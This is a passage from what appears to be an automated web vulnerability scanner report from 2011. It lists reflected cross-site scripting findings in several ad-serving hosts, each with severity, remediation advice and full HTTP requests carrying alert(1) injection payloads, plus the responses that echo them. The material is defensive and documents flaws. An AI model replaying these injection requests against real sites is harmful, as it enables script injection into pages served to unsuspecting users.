<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f92b8"><script>alert(1)</script>05d28b2545d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600&s=429613f92b8"><script>alert(1)</script>05d28b2545d&t=2" target="parent">
...[SNIP]...

4.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.reduxmedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc2b"-alert(1)-"605cd6b88a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=120x600&section=681714&6cc2b"-alert(1)-"605cd6b88a5=1 HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 19:18:16 GMT
Pragma: no-cache
Content-Length: 4638
Age: 0
Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

4.32. http://ad.scanmedios.com/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9973'-alert(1)-'b683290dc0 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250b9973'-alert(1)-'b683290dc0&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 402
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250b9973'-alert(1)-'b683290dc0&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250b9973%27-alert%281%29-%27b683290dc0%26s%3D601669%26_salt%3D1358407199%26B%3D10%
...[SNIP]...

4.33. http://ad.scanmedios.com/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe80'-alert(1)-'f0f512ee374 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250&s=601669abe80'-alert(1)-'f0f512ee374&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 404
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669abe80'-alert(1)-'f0f512ee374&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D601669abe80%27-alert%281%29-%27f0f512ee374%26_salt%3D1358407199%26B%3D10%26u%3Dhttp%253A
...[SNIP]...

4.34. http://ad.scanmedios.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a927c"><script>alert(1)</script>8783e6815d8 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250a927c"><script>alert(1)</script>8783e6815d8&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250a927c"><script>alert(1)</script>8783e6815d8&inv_code=601669&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250a927c"><script>alert(1)</script>8783e6815d8&s=601669&t=2" target="parent">
...[SNIP]...

4.35. http://ad.scanmedios.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2d'-alert(1)-'7ba8e3efc79 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250dce2d'-alert(1)-'7ba8e3efc79&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250dce2d'-alert(1)-'7ba8e3efc79&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250dce2d%27-alert%281%29-%277ba8e3efc79%26section%3D601669">
...[SNIP]...

4.36. http://ad.scanmedios.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f734e'-alert(1)-'2b959f792a9 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669f734e'-alert(1)-'2b959f792a9 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669f734e'-alert(1)-'2b959f792a9&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D601669f734e%27-alert%281%29-%272b959f792a9">
...[SNIP]...

4.37. http://ad.scanmedios.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9583"><script>alert(1)</script>2bc6827f86d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669a9583"><script>alert(1)</script>2bc6827f86d HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669a9583"><script>alert(1)</script>2bc6827f86d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=601669a9583"><script>alert(1)</script>2bc6827f86d&t=2" target="parent">
...[SNIP]...

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219c9'-alert(1)-'d6a336d9756 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:49 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683569:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 848

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad93'-alert(1)-'3d320c11be8 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:40 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34426:1296683560:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:40 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c87'-alert(1)-'b77056dfb54 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:17 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683597:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b1e'-alert(1)-'97331fa72cc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:35 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683615:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

4.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec678'-alert(1)-'8c695f1ae57 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:26 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683606:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

4.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9848'-alert(1)-'5b0c6c829a2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
